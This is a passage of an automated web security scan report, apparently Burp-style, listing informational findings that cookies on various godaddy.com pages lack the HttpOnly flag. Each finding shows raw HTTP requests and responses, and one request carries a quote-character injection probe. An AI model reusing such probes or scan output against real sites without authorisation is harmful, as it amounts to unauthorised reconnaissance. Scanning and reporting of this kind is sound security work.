Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:28 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:28 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:28 GMT; path=/
Set-Cookie: SplitValue1=95; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:28 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/ca.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=95; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:27 GMT
Connection: close
Content-Length: 128690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.104. http://www.godaddy.com/tlds/co-domain.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/co-domain.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/co-domain.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=4qyevd0n0btohuzk3oq4spum; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=4qyevd0n0btohuzk3oq4spum; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:21 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:21 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:21 GMT; path=/
Set-Cookie: SplitValue1=11; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:21 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/co-domain.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=11; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:20 GMT
Connection: close
Content-Length: 136432


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.105. http://www.godaddy.com/tlds/com.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/com.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/com.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=v4b4tqaqas41esi0gm4sofyv; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=v4b4tqaqas41esi0gm4sofyv; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:20 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:20 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/com.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:20 GMT
Connection: close
Content-Length: 132023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.106. http://www.godaddy.com/tlds/info.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/info.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/info.aspx?tld=info&ci=16860 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=wa4cz3zgcty3pkvdhyv30z4j; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=wa4cz3zgcty3pkvdhyv30z4j; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:23 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:23 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:23 GMT; path=/
Set-Cookie: SplitValue1=5; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:23 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/info.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=tld=info&ci=16860&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=5; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:22 GMT
Connection: close
Content-Length: 130499


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.107. http://www.godaddy.com/tlds/international-domain-names.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/international-domain-names.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/international-domain-names.aspx?tld=cc&ci=41914\u0027 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kvswids4omazeh1p3vllhrg3; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kvswids4omazeh1p3vllhrg3; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:29 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:29 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:29 GMT; path=/
Set-Cookie: SplitValue1=6; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:29 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/international-domain-names.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=tld=cc&ci=41914%5cu0027&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=6; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:29 GMT
Connection: close
Content-Length: 157939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.108. http://www.godaddy.com/tlds/me.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/me.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/me.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=k1p0i2c1nwnupaggi21541aq; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=k1p0i2c1nwnupaggi21541aq; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:29 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:29 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:29 GMT; path=/
Set-Cookie: SplitValue1=94; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:29 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/me.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=94; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:28 GMT
Connection: close
Content-Length: 126495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.109. http://www.godaddy.com/tlds/mobi.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/mobi.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/mobi.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=j252txn2slf2x5jqxzv2431m; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=j252txn2slf2x5jqxzv2431m; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:26 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:26 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:26 GMT; path=/
Set-Cookie: SplitValue1=9; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:26 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/mobi.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=9; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:26 GMT
Connection: close
Content-Length: 136068


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.110. http://www.godaddy.com/tlds/net.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/net.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/net.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=1tpwb5cf4wcsgqjm0wtsurwx; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=1tpwb5cf4wcsgqjm0wtsurwx; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:33 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:33 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:33 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:33 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/net.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:33 GMT
Connection: close
Content-Length: 130868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.111. http://www.godaddy.com/tlds/org.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/org.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/org.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=1jgx5n11p5zsvtfpwsxlcw32; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=1jgx5n11p5zsvtfpwsxlcw32; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:25 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:25 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:25 GMT; path=/
Set-Cookie: SplitValue1=49; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:25 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/org.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=49; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:24 GMT
Connection: close
Content-Length: 132156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.112. http://www.godaddy.com/tlds/us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/us.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/us.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=4sb20f0wo1ljuh5lgxyayda5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=4sb20f0wo1ljuh5lgxyayda5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:22 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:22 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:22 GMT; path=/
Set-Cookie: SplitValue1=98; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:22 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/us.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=98; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:22 GMT
Connection: close
Content-Length: 129004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.113. http://www.godaddy.com/tlds/ws.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/ws.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/ws.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=dzw2mpmphtfnhppqpj1puysa; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=dzw2mpmphtfnhppqpj1puysa; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:30 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:30 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:30 GMT; path=/
Set-Cookie: SplitValue1=4; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:30 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/ws.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=4; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:30 GMT
Connection: close
Content-Length: 129788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.114. http://www.godaddy.com/tlds/xxx-domain.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/xxx-domain.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/xxx-domain.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hs13gambhjf12ebhkttdy2n5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hs13gambhjf12ebhkttdy2n5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:24 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:24 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:24 GMT; path=/
Set-Cookie: SplitValue1=91; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:24 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/xxx-domain.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=91; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:24 GMT
Connection: close
Content-Length: 167830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.115. https://www.godaddy.com/Domains/Search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Domains/Search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Domains/Search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=k2jqsg0don5vxc43ddmelvcb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=k2jqsg0don5vxc43ddmelvcb; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:13 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Domains/Search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=dcmduaecwdrcwejfwaajofhjhgcccdua; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:43:13 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=dcmduaecwdrcwejfwaajofhjhgcccdua; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:13 GMT
Connection: close
Content-Length: 183951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.116. https://www.godaddy.com/Payment/payment-options.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Payment/payment-options.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Payment/payment-options.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=znipwzi0ukgf3qa0ecrv3t0n; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=znipwzi0ukgf3qa0ecrv3t0n; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
Set-Cookie: SplitValue1=73; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:27 GMT; path=/
